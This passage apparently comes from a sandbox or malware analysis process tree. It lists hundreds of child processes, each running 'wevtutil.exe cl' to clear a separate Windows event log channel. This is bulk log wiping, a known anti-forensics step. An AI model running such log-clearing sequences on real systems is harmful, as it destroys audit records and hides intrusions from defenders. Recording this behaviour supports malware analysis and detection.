wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
3⤵
PID:400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
3⤵
PID:4020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
3⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
3⤵
PID:3192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
3⤵
PID:848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
3⤵
PID:1176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
3⤵
PID:3656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
3⤵
PID:876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
3⤵
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
3⤵
PID:488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
3⤵
PID:3528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
3⤵
PID:4008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
3⤵
PID:2932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
3⤵
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
3⤵
PID:2232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
3⤵
PID:180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
3⤵
PID:260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
3⤵
PID:3972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
3⤵
PID:2300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
3⤵
PID:3260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
3⤵
PID:3592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
3⤵
PID:1340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Call"
3⤵
PID:3188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
3⤵
PID:2824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
3⤵
PID:1176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
3⤵
PID:3844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
3⤵
PID:900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
3⤵
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
3⤵
PID:3336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
3⤵
PID:1892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
3⤵
PID:3876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
3⤵
PID:4036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Analytic"
3⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Operational"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
3⤵
PID:3724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
3⤵
PID:152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
3⤵
PID:272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
3⤵
PID:2268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
3⤵
PID:3260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
3⤵
PID:3592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
3⤵
PID:1364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
3⤵
PID:2916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
3⤵
PID:3188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
3⤵
PID:3844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
3⤵
PID:900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
3⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
3⤵
PID:3336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
3⤵
PID:1892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
3⤵
PID:3876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
3⤵
PID:4036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
3⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
3⤵
PID:3764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
3⤵
PID:152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
3⤵
PID:2488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
3⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
3⤵
PID:3260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
3⤵
PID:3592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
3⤵
PID:3192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
3⤵
PID:3452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
3⤵
PID:2812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
3⤵
PID:2448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
3⤵
PID:2160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
3⤵
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
3⤵
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
3⤵
PID:3900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
3⤵
PID:200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
3⤵
PID:2200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
3⤵
PID:312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
3⤵
PID:2212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
3⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
3⤵
PID:1364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
3⤵
PID:3988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
3⤵
PID:3192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
3⤵
PID:1036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
3⤵
PID:4012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
3⤵
PID:3700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
3⤵
PID:4016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
3⤵
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
3⤵
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
3⤵
PID:2160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
3⤵
PID:2180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
3⤵
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
3⤵
PID:1736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
3⤵
PID:4000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
3⤵
PID:3900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
3⤵
PID:200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
3⤵
PID:2200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
3⤵
PID:2796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
3⤵
PID:2912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
3⤵
PID:988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
3⤵
PID:1364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
3⤵
PID:3988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
3⤵
PID:3192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
3⤵
PID:1036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
3⤵
PID:3656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
3⤵
PID:3700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
3⤵
PID:4016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
3⤵
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
3⤵
PID:1984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
3⤵
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
3⤵
PID:2160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
3⤵
PID:2232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
3⤵
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
3⤵
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
3⤵
PID:3972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
3⤵
PID:2300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
3⤵
PID:3900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
3⤵
PID:3028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
3⤵
PID:496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
3⤵
PID:400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
3⤵
PID:3096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
3⤵
PID:644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
3⤵
PID:2916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
3⤵
PID:3188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
3⤵
PID:416

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"
3⤵
PID:488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"
3⤵
PID:2448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"
3⤵
PID:3336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"
3⤵
PID:2816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"
3⤵
PID:264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"
3⤵
PID:1736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
3⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
3⤵
PID:360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
3⤵
PID:152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
3⤵
PID:2488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
3⤵
PID:496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"
3⤵
PID:400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"
3⤵
PID:3096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"
3⤵
PID:644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
3⤵
PID:2512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
3⤵
PID:3188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
3⤵
PID:3844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"
3⤵
PID:736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"
3⤵
PID:2448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"
3⤵
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"
3⤵
PID:2180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
3⤵
PID:264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
3⤵
PID:1736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"
3⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"
3⤵
PID:360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"
3⤵
PID:152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"
3⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ESE/Operational"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
3⤵
PID:3096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
3⤵
PID:992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"
3⤵
PID:2064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"
3⤵
PID:1036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"
3⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
3⤵
PID:2364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EmbeddedAppLauncher/Admin"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EmbeddedAppLauncher/Operational"
3⤵
PID:2924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"
3⤵
PID:3796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
3⤵
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
3⤵
PID:2940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
3⤵
PID:2180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
3⤵
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
3⤵
PID:264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
3⤵
PID:284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
3⤵
PID:256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
3⤵
PID:1380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
3⤵
PID:252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"
3⤵
PID:1704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"
3⤵
